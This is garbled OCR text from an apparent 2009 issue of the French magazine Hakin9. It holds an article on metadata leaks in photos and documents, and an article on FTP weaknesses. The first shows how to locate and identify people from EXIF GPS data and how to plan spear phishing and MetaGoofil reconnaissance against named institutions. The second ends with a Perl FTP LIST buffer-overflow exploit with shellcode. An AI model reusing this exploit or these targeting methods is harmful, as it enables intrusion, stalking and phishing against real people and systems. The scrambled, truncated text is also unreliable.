montrait la prsentatrice partir de hanches toute nue. Le programme utilis pour le traitement de photos, Photoshop, n'a pas actualis les mtadonnes de la photo. Cela semble surprenant au premier abord mais les appareils photo modernes (par exemple, Nikon Coolpix P6000) et les tlphones qui permettent
6/2009 HAKIN9 25

DOSSIER
de prendre des photos (par exemple, iPhone) sont capables d'enregistrer automatiquement les coordonnes gographiques de l'endroit o la photo a t prise dans les fichiers graphiques. Vous connaissez probablement l'histoire d'un utilisateur d'iPhone (connu sur Internet comme Nephew chan) qui a prsent une photo de sa tente en bain sur un forum Internet public. Comme ces photos contenaient les coordonnes gographiques ajoutes authentiquement par le tlphone, un autre utilisateur du forum a retrouv l'admirateur et a commenc le faire chanter en demandant d'autres photos. Finalement, toute l'histoire a t mise au jour et tous les protagonistes ainsi que la communaut Internet ont appris les dtails de cette histoire exceptionnelle. Les exemples prsents dmontrent clairement que partager ses propres photos sans rflchir peut avoir des consquences nfastes. Comment un cybercriminel peut collecter, analyser et utiliser ses propres fins les mtadonnes contenues dans les fichiers graphiques ? La premire tape consiste bien videmment trouver des photos susceptibles de contenir des mtadonnes intressantes. Trouver des donnes principales n'est pas le sujet cl de cet article, je mentionnerais donc seulement que pour trouver des photos appartenant une organisation ou une personne particulire, il suffit de bien parcourir Internet. l're de la rvolution numrique, lorsque quasiment toutes les organisations et les particuliers ne peuvent pas se passer d'un site Web, d'un blog photo ou d'un e-commerce, |trouver des photos numriques lies une institution ou une personne qui nous intresse consiste le plus souvent former une requte approprie dans l'un des moteurs de recherche. Une fois les fichiers intressants trouvs, utiliser les mtadonnes y contenues n'est qu'un jeu d'enfant. Regardons comment les mtadonnes collectes par l'intrus dans l'une des histoires racontes ont t utilises. Afin de trouver une photo originale mises sur Internet par Nephew chan, il suffit de faire une requte dans le moteur de recherche Google. Nous retrouvons rapidement la photo utilise par l'intrus, elle est accessible l'adresse suivante : http://images.en cyclopediadramatica.com/images/0/ 01/Nephew-owned.jpg. Ensuite, il suffit d'analyser les mtadonnes Exif, contenues dans le fichier. La mthode la plus simple pour ce faire consiste installer un complment appel Exif Viewer dans le navigateur Firefox. Une fois le complment install et le navigateur redmarr, il suffit d'afficher la photo en faisant un clic droit dessus, de slectionner l'option View Image Exif Data. La fentre du complment Exif Viewer s'affichera. Elle contient une srie d'informations Exif. L'image contient les donnes suivantes (liste rduite, en raison de lisibilit) : Camera Make = Apple, Camera Model = iPhone, GPS Latitude Reference = N, GPS Latitude = 38/1,3550/100,0/1 [degrees, minutes, seconds] ===> 38 35.5 , GPS Longitude Reference = W, GPS Longitude = 90/1,2657/100,0/1 [degrees, minutes, seconds] ===> 90 26.57 . permettant d'afficher immdiatement l'emplacement indiqu par les donnes GPS dans le programme Google Earth. Aprs avoir trouv la photo qui nous intresse, nous sommes capables d'afficher la carte satellite de l'endroit o elle a t prise ! De plus, grce au service Google Street View, proposant les vues panoramiques de certaines parties du monde (aujourd'hui principalement les tats-Unis), nous pouvons faire une excursion virtuelle autour de la maison (Figure 1), o la photo a t prise ! Est-ce la magie ? Non, il s'agit tout simplement de profiter des mtadonnes partages de manire irrflchie. Nous essayerons prsent trouver des mtainformations intressantes caches dans les photos prsentes sur la toile. En parcourant le site Web du Prsident de Pologne, j'ai dcid de vrifier si les mtadonnes des photos y prsentes sont prpares de manire professionnelle et si elles ne cachent pas d'informations supplmentaires. J'ai trouv des photos simples en apparence l'adresse http://www.prezydent.pl/ x.download?id=29526128. Elles prsentent Lech Kaczyski en runion avec le pape actuel. L'analyse des mtadonnes du fichier JPG, l'aide du complment Exif Viewer, a rvl plusieurs dtails intressants. Avant tout, la vue de la photo originale (Figure 2) rvle que la Premire Dame a t efface de la photo place sur le site. Est-ce que le Prsident a honte de son pouse et a ordonn de l'effacer d'une partie de photos publies sur le site Web officiel ? D'autres mtadonnes qui ne devraient pas se trouver forcement sur la version finale de la photo : By-line = Jacek Turczyk et Originating Program = FotoWare FotoStation. La photo nous donne les coordonnes personnelles du photographe qui l'a prise et le type du logiciel (spcialis et cher) qu'il a utilis. En analysant d'autres photos de ce site, nous serons capables de trouver d'autres mtadonnes, une partie de photos ne contient en revanche aucune donne Exif. Les personnes responsables du site www.prezydent.pl n'ont pas encore dfini une politique correcte de gestion des mtadonnes. J'ajoute encore qu'il est difficile de trouver une photo dpourvue de mtadonnes intressantes sur le site

Exif Viewer gnre galement le fichier KML (en anglais Keyhole Markup Language),

Figure 2. La premire dame a t supprime sur une partie de photos prsentes sur le site Web du Prsident de Pologne
26 HAKIN9 6/2009

J'AI vos (mtA)doNNes !

6/2009 HAKIN9

27

DOSSIER
Web www.premier.gov.pl (premier ministre polonais). Publier les photos contenant des mtadonnes peut faire apparatre des risques supplmentaires, invisibles au premier abord. Remarquons qu'en analysant les mtadonnes, nous obtenons les informations directement ou indirectement sur le logiciel spcifique utilis par les photographes ou les personnes qui modifient les photos. titre d'exemple, si la photo est prise avec l'appareil iPhone, l'auteur possde le plus probablement le logiciel Itunes sur son ordinateur. Si la photo est prise avec l'appareil Canon EOS 400D, l'ordinateur de l'auteur est quip le plus probablement d'un logiciel fourni par le fabricant. Si les donnes Exif montrent la dernire modification effectue au moyen du paquet Adobe Photoshop, l'auteur dispose le plus probablement de ce logiciel. Les mtadonnes contiennent souvent les informations qui prcisent la version concrte du logiciel. Un cracker rus peut utiliser ce type d'informations pour choisir un exploit correct (cibl un type concret de logiciel), ce qui lui permettra d'effectuer une attaque efficace sur les ordinateurs de l'auteur des photos. Ce type d'informations (type et version du logiciel) peut tre utilis aussi dans les attaques du type spear phishing. Spear phishing constitue une sorte de phishing cibl (en anglais spear lance). titre d'exemple, si nous savons que l'auteur de la photo utilise un logiciel spcialis FotoWare FotoStation Pro, l'intrus faisant semblant d'tre un reprsentant de la socit FotoWare peut envoyer un message spcialement prpar sa victime. En se servant des symboles et des structures graphiques utilises par la socit FotoWare (ces informations se trouvent sur le site officiel du fabricant), l'intrus peut prparer un faux message envoy par ce fabricant spcialement aux utilisateurs enregistrs du paquet FotoStation Pro. Ce message contiendrait un complment critique (qui en ralit est un cheval de Troie, un virus, etc.). du logiciel et qui recommanderait de l'installer immdiatement. Connaissant en plus les coordonnes de la personne attaque ( titre d'exemple, grce l'entre By-line = dans les mtadonnes de la photo),
28 HAKIN9 6/2009

il peut adresser ce message en utilisant le prnom et le nom dcouverts pour augmenter sa crdibilit. Le phishing de ce type, prcisment cibl, a plus de chance de russir car il est plus crdible que les centaines de milliers de messages gnraux adresss tout le monde et non une personne prcise. Pour terminer nos rflexions sur les mtadonnes contenues dans les fichiers graphiques, il faut mentionner deux services qui peuvent aider les intrus trouver les photos contenant des mtadonnes intressantes. Si un intrus trouve une photo publie par une personne ou une institution qu'il recherche et cette photo est dpourvue de mtadonnes, il existe une autre astuce. Pour trouver d'autres occurrences de la mme photo ou d'une photo similaire sur Internet, le cracker peut se servir d'une recherche d'images inverse (en anglais reverse image search). Le service tineye.com propose de rechercher toutes les occurrences d'une photo donne (indique par une adresse URL ou tlcharge depuis un disque local) sur Internet. L'intrus espre ainsi de trouver une autre occurrence de la mme photo avec des mtadonnes intressantes. Le service Wayback Machine peut servir aux recherches similaires. Ce service permet de parcourir les versions d'archives de n'importe quel site Web. Mme si une institution publie aujourd'hui des photos dpourvues de mtadonnes, ces moyens de protection n'taient pas en vigueur

dans le pass et la version d'archive du site pourrait contenir des photos avec des mtadonnes. Comme vous pouvez voir sur les exemples dmontrs, si vous publiez des photos sur Internet, rflchissez ce que vous partagez en le faisant. En publiant une photo compromettante, n'oubliez pas que cacher un visage ou dcouper un fragment pourrait tre insuffisant. Vrifiez donc si les mtadonnes ne contiennent pas de miniature de la photo originale !

Non seulement les photos

Gnrer les mtadonnes importantes du point de vue de la scurit d'informations n'est pas uniquement le domaine de fichiers graphiques. Les mtainformations sont intgres dans de nombreux formats diffrents de fichiers. Il faut faire particulirement attention aux fichiers au format PDF et Microsoft Office car ils sont les plus populaires. L'histoire de Dennis Rader peut nous apprendre que les mtadonnes contenues dans un fichier DOC sont extrmement importantes. Ce meurtrier en srie, qui avait tu 10 personnes aux tats-Unis dans les annes 1974 1991, tait particulirement connu de sa cruaut et de la passion pour correspondre avec la police et les mdias. En 2005, il a dcid d'envoyer un message sous forme lectronique et l'a fait sur une disquette. Les policiers ont analys les mtadonnes contenues dans le fichier DOC, ont trouv

Figure 3. Mtadonnes texte contenus dans le fichier PDF

J'AI vos (mtA)doNNes !

6/2009 HAKIN9

29

DOSSIER
le nom de l'glise laquelle Rader tait li (Christ Lutheran Church) et les donnes de l'utilisateur qui avait modifi le fichier en dernier (Dennis). Ces informations ont bien videmment suffit pour trouver et arrter le meurtrier en srie. L'histoire moins sobre de David L. Shith est galement connue. David, concepteur du virus connu Melissa, a t retrouv grce aux donnes GUID (en anglais Globally Unique Identifier) contenues dans plusieurs fichiers DOC. Ces informations ont permis d'arrter Shith et de le condamner 20 mois de prison. La plus simple mthode pour trouver des mtadonnes dans n'importe quel fichier, mme celui dont le format est inconnu, consiste l'ouvrir dans un diteur de texte. En gnral, ct des suites de caractres compltement illisibles se trouve une srie de lignes au format XML contenant des entres lisibles et faciles interprter. titre d'exemple, si nous ouvrons un fichier PDF (Figure 3) dans l'diteur de texte Notepad++, nous trouverons plusieurs informations intressantes. L'entre <xap: CreatorTool>Acrobat PDFMaker 8.1 for Word</xap:CreatorTool> suggre clairement que l'auteur a utilis le programme PDFMaker 8.1 pour gnrer le fichier. Dans le cas de fichiers PDF, nous n'avons pas besoin de regarder le fichier texte, ce qui n'est pas trs agrable. Il suffit d'ouvrir le fichier susmentionn dans le navigateur Adobe Reader et de slectionner ensuite l'option proprits dans le menu fichier. Vous verrez alors s'afficher une fentre (Figure 4) prsentant plusieurs mtainformations contenues dans le fichier, notamment : auteur : "Ruhnka, Bagby", application : Acrobat PDFMaker 8.1 for Word, concepteur PDF : Acrobat Distiller 8.1.0 (Windows), version PDF : 1.6 (Acrobat 7.x). pourra ensuite tester pour obtenir un accs aux services utiliss par l'auteur en prenant son identit. Dans ce cas-l, servir Ruhnka et Bagby sont des noms de deux auteurs du document. Les informations similaires peuvent tre trouves suite l'analyse des mtadonnes contenues dans les fichiers DOC (et autres types de fichiers gnrs par le paquet Microsoft Office). De mme que les fichiers PDF, il est possible d'ouvrir les fichiers gnrs par MS Word dans un diteur texte et de trouver les mtadonnes contenues dans le fichier. Ce n'est pas trs pratique. Il est possible d'obtenir ces donnes sous une forme plus claire en affichant les proprits du fichier DOC sous Windows et en passant l'onglet Conclusion. Dans le fichier test que j'ai tlcharg depuis le site www.abw.gov.pl (site de l'Agence de la scurit interne) j'ai trouv des mtadonnes suivantes : auteur m_wilczek, enregistr la dernire fois par war009262.

Ce type de donnes (type et version du logiciel utilis par l'auteur) peut servir l'intrus pour choisir un exploit efficace dans les attaques du type spear phishing dont nous avons parl auparavant. Remarquons aussi que la ligne Auteur : "Ruhnka, Bagby" peut contenir des logins potentiels (car ce sont des noms que l'auteur utilise lors du travail sur l'ordinateur) que le cracker

Est-ce que les donnes de ce type peuvent constituer un risque ? Cela ne peut pas tre exclu. Elles peuvent aider en quelque sorte dterminer les donnes personnelles des auteurs de ce document ou dterminer les logins d'utilisateur qu'ils utilisent. Cela prouve galement que l'Agence de la scurit interne ne fait pas particulirement attention au problme de scurit des mtadonnes. Microsoft lui-mme avertit sur son site que les mtadonnes contenues dans les fichiers Office peuvent rvler les informations suivantes : prnom, nom, initiaux, nom de l'entreprise ou de l'organisation, nom de l'ordinateur, nom du serveur de fichiers ou du disque o le document a t enregistr, donnes relatives aux objets OLE utiliss dans le document, donnes personnelles des personnes qui ont dit auparavant le fichier, donnes relatives la version du document,

Figure 4. Mtadonnes dans le fichier PDF : vue du niveau du navigateur Adobe Reader
30 HAKIN9 6/2009

J'AI vos (mtA)doNNes !

informations concernant le modle du document utilis, commentaires.

sur le Net
http://www.cert.org/ Computer Emergency Response Team, http://www.remote-exploit.org/backtrack.html BackTrack, http://exif.org/specifications.html spcification Exif, http://en.wikipedia.org/wiki/Catherine_Schwartz Exif thumbnail story, http://encyclopediadramatica.com/User:Darkanaku/Nephew_chan Nephew chan story, http://www.microsoft.com/poland/athome/security/email/spear_phishing.mspx Qu'est-ce une attaque spear phishing ?, http://en.wikipedia.org/wiki/Dennis_Rader Dennis Rader story, http://en.wikipedia.org/wiki/Melissa_virus David L. Smith story, http://office.microsoft.com/en-us/help/HA010776461033.aspx Metadata in MS Office, http://www.edge-security.com/metagoofil.php Metadata analyzer, information gathering tool, http://gnunet.org/libextractor/demo.php3?xlang=English libExtractor Online Demo, http://www.irongeek.com/ Irongeek.

Nous pouvons donc constater qu'un particulier ou une institution qui publie sur Internet ses propres fichiers MS Office risque beaucoup. Un petit pour cent de ces fichiers est publi par les auteurs qui se rendent compte que ces fichiers peuvent fournir de nombreuses informations aux curieux. Pour terminer, je voudrais prsenter un logiciel conu spcialement pour la collecte et le traitement de nombreuses mtadonnes, appartenant une organisation concrte. Il s'agit de MetaGoofil. C'est un vrai outil complexe permettant de collecter des mtadonnes depuis toute sorte de documents publis sur les sites Internet d'une organisation indique. Le fonctionnement de l'application est assez simple. MetaGoofil recherche (dans le moteur de recherche Google) les fichiers contenant des mtainformations (par exemple, site:domena.com filetype: pdf) dans le domaine et les types de fichiers donns. Ensuite, les fichiers trouvs sont tlchargs sur le disque local et les mtadonnes y prsentes sont collectes et filtres l'aide de la bibliothque libextractor (pour tester les normes fonctionnalits de cette bibliothque, rendez-vous sur le site Web http://gnunet.org/libextractor/demo.php3 ?xlang=English). Les rsultats globaliss sont enregistrs sur le disque sous forme du fichier HTML. Afin de bnficier des fonctionnalits du programme MetaGoofil, il suffit de le lancer avec les paramtres suivants : ./metagoofil.py -d domena.com -f all -l 100 -o domena.html -t temp. Voici la signification de tous les paramtres d'appel : -d domena.com: nom du domaine analyser, -f all: type de formats de fichiers pris en compte (all signifie l'analyse de tous les types de fichiers supports), -l 100: limite du nombre des rsultats traits, -o domena.html: nom du fichier HTML rsultat, -t temp: rpertoire contenant les fichiers tlchargs pour une analyse.

MetaGoofil est capable de collecter les informations intressantes comme : logins potentiels des utilisateurs utiliss dans l'organisation donne, chemins aux ressources fichiers (cela permet de reconnatre les systmes d'exploitation utiliss, les noms de rseau et les noms des montages partags) dans lesquels les fichiers analyss taient dits, adresses MAC (d'aprs les identifiants GUID des fichiers Office o se trouve l'adresse physique de l'hte courant) des ordinateurs sur lesquels les fichiers ont t dits.

Je ne rpterai pas comment les informations de ce type peuvent tre utilises. Comme vous pouvez le constater, les fonctionnalits du script (MetaGoofil est en ralit un script crit en langage Python) sont normes. L'intrus la recherche d'informations sur une organisation donne n'a plus chercher et analyser individuellement chaque fichier publi sur le site. Le programme n'omettra aucun dtail et affichera toutes les informations obtenues sous forme d'une page HTML claire. L'intrus n'a qu' utiliser ces informations pour planifier une attaque efficace.

Conclusion

complments gratuits pour le paquet Office, permettant de supprimer les mtadonnes dans les fichiers crs aux formats les plus populaires. Internet propose galement de nombreux programmes indpendants, capables de grer plusieurs formats de mtadonnes. Enfin, il est possible d'viter de nombreuses fuites d'informations tout simplement en ne partageant pas les fichiers DOC sur le rseau car ils ne s'y prtent pas. MS Word est un programme conu pour diter les fichiers et ils devraient tre utiliss ces fins. Ce n'est srement pas un format conu pour les publications, en particulier sur la Toile ! Pourquoi donc les particuliers et les institutions srieuses (bureau du prsident de Pologne, Agence de scurit interne) partagent des milliers de mtainformations sur leurs sites ? Dans le cas des particuliers, nous pouvons expliquer cette situation par manque de connaissances et inconscience de risques. Mais comment expliquer les oprations de l'Agence de scurit interne ? Toutes les institutions doivent rflchir srieusement la mise en place d'une politique cohrente de gestion des mtadonnes. Les mtadonnes sont peut-tre critiques dans de nombreux cas et il faut donc les prendre en considration dans les procdures intgres de scurit informatique. propos de l'auteur

Les protections adquate de mtadonnes peuvent constituer un sujet d'un article part. Une analyse gnrale de la question dmontre que cela ne pose aucun problme. Des applications gratuites existent qui permettent de supprimer les donnes Exif des fichiers JPG. Microsoft propose des

L'auteur est diplm de la facult d'Automatique, d'Electronique et d'Informatique de l'Ecole Polytechnique de Silsie Gliwice. Il se spcialise dans les bases de donnes, les rseaux et les systmes informatiques. Il travaille comme administrateur rseau et systmes informatiques dans la socit Mostostal Zabrze Holding S.A. Contact avec l'auteur : wojciech.smol@mz.pl. 6/2009 HAKIN9 31

Sicchia DiDier

FOCUS Le paradoxe du modle FTP

Ds le dbut de la rvolution internet, il devint important de stocker largement des applications, des donnes et des informations sur des supports physiques importants et avec la volont de partager celles-ci selon droits et privilges particuliers. De ce constat, un protocole spcifique fut rflchi et dvelopp, comprendre file transfert protocol . Le service FTP repose sur un protocole simple mais efficace. Nanmoins, il semble particulirement sensible quelques ambiguts qui lui sont propres. examinons le principe du paradoxe FTP dont la nature s'applique aussi d'autres services.

Degr de difficult

Cet artiCle explique...

Les avantages du protocole FTP. Les faiblesses du protocole FTP. explication relative la probabilit conditionnelle. comment exploiter les failles propres aux services FTP.

Ce qu'il faut savoir...

Savoir utiliser un client FTP quelconque. Des notions en langage Perl seront un avantage. 32 HAKIN9 6/2009

fin de stocker et partager des informations via l'internet, il est trs pratique d'user d'un service de communication FTP sur le rseau TCP/IP. La contraction FTP rduit l'expression anglaise "File Transfert Protocol" (RFC 959). Ce service utilise le port 21 afin de distribuer des donnes selon droits et privilges particuliers. Le service FTP obit un modle client/serveur traditionnel, c'est--dire que le client envoie des requtes auxquelles ragit le serveur. Il s'agit donc d'un protocole, c'est--dire un langage standard de communication entre deux machines permettant des machines d'un type diffrent (ou dont le systme d'exploitation est diffrent) de transfrer des fichiers sur un rseau sous TCP/IP. Avec les serveurs Web HTTP dont la nature n'est pas trs diffrente, le service FTP est parmi les plus populaires. Ajoutons encore que la variante de FTP protge par les protocoles SSL ou TLS (SSL tant le prdcesseur de TLS) s'appelle FTPS dans une logique apprciable (RFC 2228). La mise en place du protocole FTP date de 1971, date laquelle un mcanisme de transfert de fichiers (RFC 141) entre les machines du MIT (Massachussetts Institute

of Technology) avait t mis au point. De nombreux RFC ont ensuite apport des amliorations au protocole de base, mais les plus grandes innovations datent des annes soixante-dix. Depuis le phnomne ne dsemplit pas et l'usage d'un FTP reste un cas d'cole lmentaire. Pour cette raison, aujourd'hui il sera l'objet de notre rubrique BackUp . FTP s'appuie sur le protocole Telnet pour tablir le dialogue du canal de contrle. Ceci est effectif en deux sens: premirement, le USER-PI ou le SERVER-PI devront suivre les rgles du protocole Telnet. Toutes les communications effectues sur le canal de contrle suivent les recommandations du protocole Telnet traditionnel. Ainsi les commandes FTP sont des chanes de caractres Telnet en code NVT-ASCII termines par le code de fin de ligne Telnet (comprendre la squence <CR>+<LF>, Carriage Return (retour chariot) suivi du caractre Line Feed, note <CRLF>). Si la commande FTP rclame un paramtre particulier, celui-ci est spar de la commande par un espace (<SP>). A cet effet, nous dressons une liste importante des diffrentes commandes propres au

ExPLoITATIoN dEs FAILLEs vIA ProTocoLE FTP

Commandes de paramtres de transfert. A prsent, il se prsente certaines alternatives afin de stocker et tlcharger les fichiers divers via protocole FTP et les attributs TCP/IP. Bien entendu, le novice saura se reporter sur une configuration par dfaut trs convenable et qui vite de se lancer dans une procdure par moment complexe. Nanmoins, prenons le temps de dfinir ces quelques commandes particulires (Tableau 2). Le mode de passage des donnes est une commande importante puisqu'elle se repose sur la nature mme des changes selon le protocole TCP/IP. Ainsi, il est possible de recomposer un fichier quelconque selon diffrentes alternatives qui sont notamment : Streaming, comprendre flux constant (commande S). Les donnes sont transmises comme un flux d'octets. Il n'y a dans ce cas aucune restriction sur la reprsentation des donnes, Block, comprendre par portion (commande B). Le fichier est transmis comme une suite de portions de donnes prcdes d'un ou plusieurs octets d'en-tte afin de conditionner le transfert,

Figure 1. Andrey Kolmogorov, mathmaticien russe protocole FTP. Celles-ci sont explicites dans la RFC correspondante. Elles sont tablies sur la base de 3 catgories particulires: Commandes de contrle d'accs (login et mdp, etc), Commandes de paramtres de transfert (traitement et port, etc), Commandes de service FTP (rename et delete, mkd, get, etc). correcte ou incorrecte, un serveur FTP rpond par un code de procdure adquat (un numro propre une information cite dans la RFC). Les citer dans leur ensemble encombrerait nos colonnes sans apporter de relle utilit dans l'immdiat car elles sont plusieurs centaines. Si la premire procdure est concluante, il est alors possible de dfinir les paramtres de transfert selon FTP et TCP/IP. Tableau 1. USER PASS ACCT CWD CDUP REIN QUIT Login Password Account Change working dir Change parent dir Reinitialize End session

les commandes de contrle d'accs.

Afin de simplifier le principe, nous parlerons plutt d'authentification par mot de passe (mdp) et login. Le service FTP gre les droits des usags multiples selon un principes de privilges accords par l'admi nistrateur. Une fois l'authentification russie, il se prsente encore d'autres alternatives non-ngligeables (Tableau 1). Encore un petit mot afin de signifier le caractre imprieux de l'authentification. Effectivement, il n'est pas possible de contrler le flux des commandes de contrle d'accs autrement qu'en dbutant par une saisie USER puis PASS. Lorsque que la procdure d'authentification est

Chane de caractres afin de saisir le login. Chane de caractres pour le mot de passe. Chane de caractres propre au compte USER. Permet de changer le rpertoire courant. Permet de remonter au rpertoire courant. Rinitialisation de la connexion avec notre FTP. Permet de clturer une sessions FTP en cours.

Tableau 2. PORT PASV TYPE STRU MODE Canal de passage Canal alatoire Format d'change Structure fichier Mode de passage Chane de caractres afin de dfinir le port. Permet d'attribuer un port de com alatoire. Permet de dfinir le format des changes FTP. Permet de dfinir la nature du fichier. Permet de dfinir les changes selon TCP/IP.
6/2009 HAKIN9 33

FOCUS
Compressed, sous-entend une compression des donnes afin de rduire les duplications dans le fichier et durant le transfert. L'ensemble est conditionn par des squences d'chappement deux octets. Listing 1.
geckoo@geckoo-laptop:~$ ftp ftp> open (to) ftp.arnes.si 220Connected to vevnica.arnes.si. 220- Hello!

Commandes de service ftp.

220- Welcome to the ARNES archive, Please login as `anonymous' with 220- your E-mail address as the password to access the archive. 220220- See the README file for more information about this archive. Name (ftp.arnes.si:geckoo): anonymous 331 Please specify the password. Password: snakeee@free.fr 230 Login successful.

Au-del de toutes ces considrations, un service FTP repose sur de nombreuses commandes afin d'changer des fichiers. Celles-ci sont multiples et permettent d'aller bien plus loin qu'un simple transfert. C'est alors qu'apparat vraiment la nature du serveur FTP. Les commandes suivantes sont excutes ct serveur (Tableau 3). Bien entendu, vous l'aurez remarqu en lecteur assidu, nous n'avons pas encore expliqu la commande par excellence sur FTP, comprendre la commande GET qui permet d'obtenir un fichier par transfert et via le protocole TCP/IP. Elle se dfinie ainsi, GET nom_ du_fichier.

Remote system type is UNIX. ftp> ls

Using binary mode to transfer files. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x drwxr-xr-x drwxr-xr-x drwxr-xr-x drwxr-xr-x drwxr-xr-x drwx--x--x drwxr-xr-x drwxr-xr-x lrwxrwxrwx lrwxrwxrwx drwxr-xr-x drwxr-xr-x drwxr-xr-x drwxr-xr-x ftp> syst ftp> mode 3 14 2 14 4 14 2 14 3 14 5 14 5 14 33 14 1 14 1 14 11 14 2 14 3 14 5 14 5 14 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 4096 Jan 20 13:50 arnes 4096 Jan 20 13:51 books 4096 Jan 20 13:53 faq 4096 Oct 15 4096 Mar 01 2008 formularji 1996 magazines

4096 Mar 17 14:13 mirrors 4096 Apr 14 20:36 mmedia 4096 Jan 20 14:03 network

4096 Jan 27 15:23 packages

8 Jan 29 10:04 packages2 -> packages 8 Jan 29 10:04 packages3 -> packages 2000 security

un exemple de connexion ftp traditionnel.

4096 Jun 01 4096 Mar 01 4096 Mar 01

4096 Jan 27 15:24 software 1996 szf

1996 strokovni-svet

Afin de clarifier notre explication sur les transferts FTP, nous allons rdiger sur papier une connexion quelconque. celle-ci s'effectue sur serveur FTP libre, comprendre public et avec des privilges trs limits. Ainsi, il ne nous sera pas possible d'effacer des fichiers ou de modifier la nature du serveur. Nanmoins, il compose un bel exercice pour les dbutants (en rouge figure nos requtes). Vous remarquerez que les commandes sont parfois un peu diffrentes selon les FTP. Afin d'viter les problmes, il faut profiter de la commande HELP et lister ainsi les vritables commandes (Listing 1). Dans cet exemple simple, nous constatons la prsence de code avant certaines lignes d'informations. Ceux-ci sont spcifiques et reposent sur la rigueur des diffrentes RFC. Par exemple, le code 220 attribue un flag d'identification lors du premier
34 HAKIN9 6/2009

226 Directory send OK. 215 UNIX Type: L8

We only support stream mode, sorry. ftp> cd magazines ftp> ls 250 Directory successfully changed. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 226 Directory send OK. ftp> cd informatica 2 14 50 4096 Feb 12 1998 informatica

250 Directory successfully changed. ftp> get general.txt local: general.txt remote: general.txt

200 PORT command successful. Consider using PASV. 226 File send OK. ftp> quit

150 Opening BINARY mode data connection for general.txt (4103 bytes). 4103 bytes received in 0.02 secs (224.5 kB/s) 221 Goodbye.

geckoo@geckoo-laptop:~$

ExPLoITATIoN dEs FAILLEs vIA ProTocoLE FTP

probabilits complexes. Bien que notre mathmaticien russe ne s'est pas consacr l'tude des FTP, son analyse trouve un cho intressant dans notre dossier prsent. En d'autres termes et dans notre cas, plus il se prsente de commandes (ou d'informations comme le flag ID) dans un programme, plus on augmente la probabilit de dcouvrir une faille dans l'application. C'est le propre de ce que l'on nomme prsentement le paradoxe FTP eu gard la masse importante de commandes et d'informations. Une commande quelconque intgre dans une application FTP demande (lors de son dveloppement) une allocation mmoire afin de traduire en NVT-ASCII un appel de fonction. A cet effet, si ce dveloppement souffre d'un manque de rigueur, il peut se produire des dbordements de tampon, bien connus sous le terme anglais Buffer OverFlow. Puisqu'il s'agit d'une faille grave, la porte est ouverte et l'intgrit d'un systme entier s'en trouve

Tableau 3. ABOR ALLO APPE DELE HELP LIST MKD NLST NOOP REST RETR RMD RNFR RNTO SITE STOR STOU STAT SYST PWD Abort Allocate Append Delete Aide service FTP Listing Make directory Name list No operation Restart Retrieve Remove directory Rename from Rename to Site parameters Storage Storage U Status System print working dir Commande afin d'abandonner un transfert. Permet de commander une allocation mmoire. Permet d'allouer un nom avant le transfert FTP. Permet de supprimer un fichier donn en ref. Dtermine toutes les commandes comprises. Permet de lister les fichiers et rpertoires. Cette commande permet de crer un rpertoire. Permet d'envoyer la liste des dossiers et fichiers. Commande afin d'obtenir un code OK. Permet de reprendre un transfert selon marqueur. Permet d'obtenir un fichier selon sa location. Permet de supprimer un rpertoire entier. Permet de renommer un fichier (avant RNTO). Permet de renommer un fichier (aprs RNFR). Permet de dfinir des services supplmentaires. Transfert, stockage et cration d'un fichier. Idem STOR mais en attribuant un nom unique. Permet d'tablir la situation du serveur (I/O). Commande relative aux informations du serveur. Renvoit le chemin du repertoire courant.

change. Parfois, il livre mme la version et le nom du programme FTP. Nous expliquerons plus tard que c'est une erreur grossire que de permettre ce partage d'informations sensibles. Le code 221 signifie une clture de la session.

la thorie du paradoxe ftp.

En scurit informatique, c'est une rgle essentielle : Plus on s'exprime et plus on augmente le risque de dvoiler ses faiblesses. Or, comme nous l'avons vu auparavant, un service FTP est trs bavard. Il demande beaucoup de paramtres et autres commandes (plus d'une trentaine) afin de conditionner un transfert adquat. Toutes ces particularits engendrent autant de possibilits d'exploitations malveillantes et insidieuses. Les amateurs de rhtoriques pourront se pencher sur le principe de la probabilit conditionnelle. A l'origine de cette thorie, on retrouve la large tude de Andrey Kolmogorov sur le thme des

Figure 2. Commande HELP sous Metasploit

6/2009 HAKIN9 35

FOCUS
Listing 2.
use IO::Socket; if (@ARGV < 2){ print "\nUsage: $0 <host> <user> <pass> <target>\n\n"; print "Target: 1 -> Win2k\n"; print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n"; exit; }; $host $username $password $port $list $padding = = = = = = $ARGV[0]; $ARGV[1]; $ARGV[2]; 21; "\x4c\x49\x53\x54\x20\x2a"; "\x41" x 272; x0c\xb5\x91\x7f\xe1\xd1". "\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\ x3f\xbe\x2c\xc6\xc1\xba\x80". "\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\ xfa\xf7\xb2\x76\xc1\x60\x32". "\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\ xf8\xf9\x82\x45\x6d\x39\xbb". "\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\ x6d\x39\xbb\xf5\xdb\x6f\x9a". "\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\ x01\x81\x34\x69\x54\x90\x84". "\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\ xfa\x8a\xbe\x99\x77\x83\x83". "\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\ xa3\x29\x20\xba\x6c\xab\xfe". "\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\ x39\x81\xa1\xee\x21\xff\x2c". "\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\ xc3\x83\xd2\x41\xc3\xbc\x82". "\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\ x44\x83\x2c\xef\xa5\x16\x03". "\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\ x6d\x39\xbb\xe0\x18\xed\x8c". "\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a"; if ($ARGV[3] == '1'){ $payload = $list.$padding.$address2k.$nopsled.$shellcode; } elsif ($ARGV[3] == '2'){ $payload = $list.$padding.$address2k.$nopsled.$shellcode; } else{ $payload = $list.$padding.$address2k.$nopsled.$shellcode; } print "\n[=] Connected.\n"; sleep 1; print "[=] Sending $user_string"; $sock->send($user_string); sleep 1; print "[=] Sending $pass_string"; $sock->send($pass_string); sleep 1; $sock->send($port_string); sleep 1; print "[=] Sending payload...\n"; $sock->send($payload); sleep 1; if 